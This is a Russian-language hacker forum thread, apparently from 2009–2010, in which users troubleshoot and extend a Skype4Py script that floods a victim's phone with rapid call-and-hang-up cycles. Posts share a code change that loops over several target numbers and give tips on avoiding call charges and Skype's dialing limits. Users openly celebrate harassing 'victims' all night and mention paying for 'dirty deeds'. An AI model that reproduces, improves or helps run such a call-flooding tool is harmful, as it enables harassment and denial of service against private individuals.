copying Skype4Py/Languages/ja.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/tr.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/fi.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/pl.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/de.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/ro.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/it.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/en.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/ru.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/bg.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/sv.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/lv.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/hu.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/x1.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/he.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/cz.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/ko.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/no.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/pp.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
running install_lib
running install_egg_info
Removing /usr/local/lib/python2.6/dist-packages/Skype4Py-1.0.31.0.egg-info
Writing /usr/local/lib/python2.6/dist-packages/Skype4Py-1.0.31.0.egg-info

eval@fork:~/Downloads/Skype4Py-1.0.31.0$ cd ~

eval@fork:~$ python flood.py
File "flood.py", line 2
SyntaxError: Non-ASCII character '\xd0' in file flood.py on line 2, but no encoding declared; see http://www.python.org/peps/pep-0263.html for details
eval@fork:~$
Вчем может быть проблема?
Кодировка неправильно указана - поменяй на свою дефолтную (вторая строчка скрипта)...

shellz[21h]
08.06.2009, 11:56
login999, спасибо. Удалил коменты в начале все заработало, правда сброс вызова не сразу, деньги снимают ;(

inlanger
08.06.2009, 12:44
Скрипт тестировался только с последней, 4й версией скайпа. На линухе есть только 2я, на ней не тестировал.

shellz[21h]
08.06.2009, 13:36
подразумеваю что от скорости работы компа зависит, иногда нормально сброс идет. Странно, когда запускаю флуд, проц качигарит аж на 70%

.Varius
15.06.2009, 20:34
Так на дедик ставь...

dark-klin
19.10.2009, 21:46
Давай GUI !

login999
19.10.2009, 22:40
Давай GUI !
Не будет гуя.
Этот вопрос с inlanger в своё время уже обсуждали.
Либа кривая, и при работе с многопоточностью скрипт ложится, а без многопоточности гуя нет =/

razb
20.10.2009, 01:26
Может стоит тему к интерпретируемым языкам перенести?

ixtor1
09.11.2009, 06:59
извините а ваша программа SkypeFlooder работает в 7?можна узнать ,а то не как не выходит её запустить..

[Abbath]
09.11.2009, 11:29
хахаха я б на месте жертвы сделал бы платные входящие=)

KENT1994
24.11.2009, 23:57
парни вроде всё пашет , но он у меня просто звонит....как сделать чтобы он звонил и сбрасывался через 3сек
БЛИН СОРРИ ТУПАНУЛ((((((лучше всего timeout 10 поставить) :) шоб деньги не съедало

0ldbi4
26.11.2009, 00:09
А сорс exe можно? у тебя ПМ переполнен)

vgcom
30.11.2009, 21:40
огромное спасибо автору за вещь!
есть ли возможность как-то реализовать прозвон по 2м номерам по-очереди?

зарание благодарен.

0ldbi4
01.12.2009, 00:56
vgcom там все просто, если хоть немного знаком с семейством PHP тот для тебя это не составит труда, мне интересно в экзе просто интерпритируются команды питона или написано отдельНо?

Markus_13
02.12.2009, 02:44
0ldbi4, в экзе просто интерпритируются команды питона, это помоему в теме упоминалось

KENT1994
02.12.2009, 22:18
народ делайте паузу 7 и всё ок)все пашет, при сбросе звонок каждые 20-30сек

Nightmarе
02.12.2009, 23:31
Оценил.
Вещица действительно убойная.
Автору огромный респект!!!!!!!!!!!

Единственное пожелание, добавить 2 или 3 номера для флуда, чтобы можно было выбрать, в случайном порядке звонить на один из 2 номеров, или с какой то переодичностью, ну и кол во номеров, думаю до 10 штук было бы неплохо, чтобы на всю ночь поставить и радоваться жизни.

waik
02.12.2009, 23:36
Афтору огромный респект!Молодец!(куплю акк skype!!!)

Nightmarе
02.12.2009, 23:42
+ к этому сервису очень хорошо подходит этот сервис:
http://skype-webmoney.ru/
можно положить любую сумму хоть 1$ или меньше.
то что надо для грязных делишек =))

Nightmarе
03.12.2009, 19:58
Можно ли уточнить кто в правилах скайпа разбирается, там есть запрет на набор номеров:
http://www.skype.com/intl/ru/legal/terms/fair_usage/
цитата:
Кроме того, максимальное число номеров, которые могут быть набраны за один день, составляет 50.
Это распостраняется на набор разных номеров, или если на один и тот же звонить 24 часа в сутки то никакого лока не будет?
Просто я пологаю что какие-то ограничения есть :(

0ldbi4
03.12.2009, 23:38
Кто возьмется реализовать мульти акк и мульти таргет(есть соображения)???

svesve
04.12.2009, 22:31
кто точно скажет скоко за соединение берут?
0.015 или 0.07 ??

KENT1994
04.12.2009, 23:13
вроде 12

Nightmarе
04.12.2009, 23:37
мне 0,20 хватает чтобы на любой номер России названивать ;)

waik
04.12.2009, 23:54
inlanger -огромное спасибо!Робит!!!!!!
Nightmarе -спасибо помог с пополнением баланса!!

DeaD_MoroZ
08.12.2009, 06:00
а вот такой вопрос, а нельзя ли реализовать чтоб когда человек брал трубку, ему проигрывался музыкальный файл, и когда он заканчивался программа ложила трубку???

Nightmarе
08.12.2009, 06:08
ИМХО в этом случае будут сниматься деньги.

DeaD_MoroZ
08.12.2009, 06:14
ИМХО в этом случае будут сниматься деньги.
не, ну это кому угодно понятно(= у меня был другой вопрос(а не будут ли сниматься деньги или нет), так можно реализовать проигрывание файла в трубку??? если да, то как???

stepashka_
08.12.2009, 13:21
Прога сейчас актуальна? работает?

waik
08.12.2009, 14:03
stepashka_ ну у меня работает,только я ставлю 7сек паузу но деньги иногда снимают иногда нет.

Nightmarе
08.12.2009, 15:41
сейчас актуальна.
Правда я уже другой пользуюсь =))

DeaD_MoroZ
09.12.2009, 11:39
сейчас актуальна.
Правда я уже другой пользуюсь =))
чем пользуешься?

Nightmarе
09.12.2009, 15:45
Свой собственный софт написал на Delphi, не хотелось бы ничего плохого про софт от ТСа говорить, но имея исходники на руках где всё понятно преимуществ горааздо больше.
Реализовал-таки прозвон нескольких номеров (хоть до бесконечности) ну и так, по мелочи...

t04
09.12.2009, 18:35
Кто нить может написать подобное на делфи?

whexp
09.12.2009, 18:38
прочитай предыдущий пост :)

DeaD_MoroZ
10.12.2009, 17:00
Кто нить может написать подобное на делфи?
вот человеческое... не знаю как назвать... не знаю как других-но меня сильно улыбнуло(=

vgcom
14.12.2009, 14:39
Всеравно снимает со счета 0.06 - при паузе 10
????

login
15.12.2009, 00:38
а можно как нить привязать скрипт к опр окошку скайпа? ну т.е. запускаем скайп и скрипт привязывается к нему, затем еще 1 скайп и скрипт уже привязывается к нему и так до бесконечности...? реально это?

Nightmarе
15.12.2009, 06:09
а можно как нить привязать скрипт к опр окошку скайпа? ну т.е. запускаем скайп и скрипт привязывается к нему, затем еще 1 скайп и скрипт уже привязывается к нему и так до бесконечности...? реально это?
Для начала попробуй запустить скайп дважды, и все вопросы сами собой отпадут.
И не надо спрашивать только "а как скайп дважды запустить"

login
15.12.2009, 09:41
скайп я дважды запустил, но exe 2 флудера закрывается после введения номера и паузы...

login
15.12.2009, 09:57
все разобрался сам)
1 акк скайпа на 6 номеров норм и деньги не кушает)

спасибо Автору за сие творение)

+++++++++++++++++++++++++++++++++++++++

на WinXP все норм, 3-4 номера и более флудит(от машинки зависеть будет, а вот на Win7 чет какая то херня... не хочет он привязываться ко второму окну скайпа) есть решение?

zozoka
16.12.2009, 01:42
А реально как нибудь без денег на сйкапе сие действие сделать??

Nightmarе
16.12.2009, 05:59
А реально как нибудь без денег на сйкапе сие действие сделать??
Реально, для этого надо зайти в скайп, запустить флудер, и флудить, но в этом случае звонки работать не будут ;)

stepashka_
17.12.2009, 00:26
Народ запускаю на деде вот что пишет
Дед 2003

http://s48.radikal.ru/i122/0912/b6/38e538b8db02.jpg

0ldbi4
17.12.2009, 13:25
3вонок не может быть установлен примерно так это звучит на русском(сбой вызова), возможная причина:
- неполадки с таргетфоном
- блокировка входящих с ИП фонов на таргетфоне

*

waik
17.12.2009, 13:39
НУ вот сломали.

login
17.12.2009, 18:57
на 2003 деде отказывается фунциклировать(

stepashka_
18.12.2009, 11:37
подскажите ввожу номер
потом задержку ставлю 7 деньги уходят
когда задержка один не уходит
хз почему так

1kaktyc
07.01.2010, 15:22
Автор респект круто все работает и не снимает деньги (тестировал на паузе 3 и на Украине)
лови +

KENT1994
30.01.2010, 15:01
Народ запускаю на деде вот что пишет
Дед 2003

http://s48.radikal.ru/i122/0912/b6/38e538b8db02.jpg
такая же хня :mad: :mad: да хз чо делать , ты исправил?

andreipup
30.01.2010, 20:51
такая же хня :mad: :mad: да хз чо делать , ты исправил?

Скорей всего нет звуковой карты)
Я скока не испытывал на 2003 не на одном не пашет.
Вы просто наберите номер любой и ткните на вызов если не звонит то нет карты.

Eff0rd
01.02.2010, 12:38
битая ссылка...

Eff0rd
01.02.2010, 13:00
скрипт классный, но хотелось бы по стандарту - чтобы был экзешник и интерфейс обычного софта =) хотя это и так круто!!!)) автору респект!))

эх, но деньги почему то всё равно жрёт. ставил 30 сек ожидание между следующим звонком и минуту - жрёт. а остальное это уже не флуд получается. да думаю даже с 5 минутами жрать будет (;

sergey_54
11.02.2010, 12:27
Нужно было звонить по списку, сделал криво но работает

строки

num = raw_input("Input tel number, like +1234567890: ")
pause = raw_input("Input pause(sec): ")
while 1==1:

Заменил на

pause = "10"
t = ['+7********', '+7*********', '+7**********']
for num in t:

сделал flud.bat

C:\Python26\python.exe C:\Python26\call100.py
call d:\flud.bat

по циклу пашет

sergey_54
11.02.2010, 12:33
У SIP есть тоже API кто может думал по этому поводу

Мобильные операторы могут закрыть доступ к звонкам из скайпа, есть еще альтернативы для флуда не через скайп и сип, чтобы были реальные но разные номера отзвона?

SWAPPER
12.02.2010, 01:26
"У SIP есть тоже API кто может думал по этому поводу"
SIP это протокол, API для него нету, есть компоненты для осуществления звонков.
А касательно флуда с помощью скайпа, то, насколько мне известно, то скайп сейчас занимается закрытием возможностей флуда через него.

stepashka_
15.02.2010, 19:35
Почему деньги иногда уходят не подскажете?

sergey_54
18.02.2010, 09:15
Почему деньги иногда уходят не подскажете?

Когда канал меленый и когда ресурсов машины не хватает скрипт или скайп уходит в очередь

qwerra
27.02.2010, 22:35
СПС автору,всё по прежнему пашет ;)

inlanger
06.04.2010, 17:45
Конечно пашет. Скрипт очень простой, от этого рабочий :)

AlexTheC0d3r
06.04.2010, 19:58
"У SIP есть тоже API кто может думал по этому поводу"
SIP это протокол, API для него нету, есть компоненты для осуществления звонков.
А касательно флуда с помощью скайпа, то, насколько мне известно, то скайп сейчас занимается закрытием возможностей флуда через него.
откуда такая информация? пруф ит

dedmaroz
08.04.2010, 03:37
кушает деньги!

thekandiz
13.04.2010, 01:32
кушает деньги!

Только что проверил с поузой 0, звонков сделал 15 сняло 0 цетов))

qwerra
14.04.2010, 02:07
dedmaroz
Откуда у тебя деньги,когда их никогда и не было? :D
Ничё не снимает,всё норм.

~STALKER~
17.04.2010, 13:56
код норм ) работает на ура ) ТС молодец
вот одна проблемка когда закрою программу скайп всеравно продолжает звонить как то плохо получается (

qwerra
17.04.2010, 18:38
скайп всеравно продолжает звонить как то плохо получается (
Очень интересно :D ,не сталкивался)
Какая версия скайпа и ОС?

AlexTheC0d3r
17.04.2010, 20:54
Очень интересно :D ,не сталкивался)
Какая версия скайпа и ОС?
Он о том, что если скайп начал звонить, то звонок не прерывается при выходе, лечится легко

~STALKER~
18.04.2010, 21:16
Он о том, что если скайп начал звонить, то звонок не прерывается при выходе, лечится легко

да именно так тоисть скрипт уже выполняет действие дзвонка и я его закрываю а скайп всеравно продолжает дзвонить как и должно было быть но лутше если б при закрытие проги в скайпе все прекращалось )

Sunstrider
18.04.2010, 21:23
AlexTheCoder с гуем сделал и не че ставить не надо

Dead4ik
12.05.2010, 17:40
У меня при 1 же звонке сняло. 1 секунда пауза

4upakabr0
29.05.2010, 04:34
У меня похавал мани. Пауза между звонками 10.
Что может быть?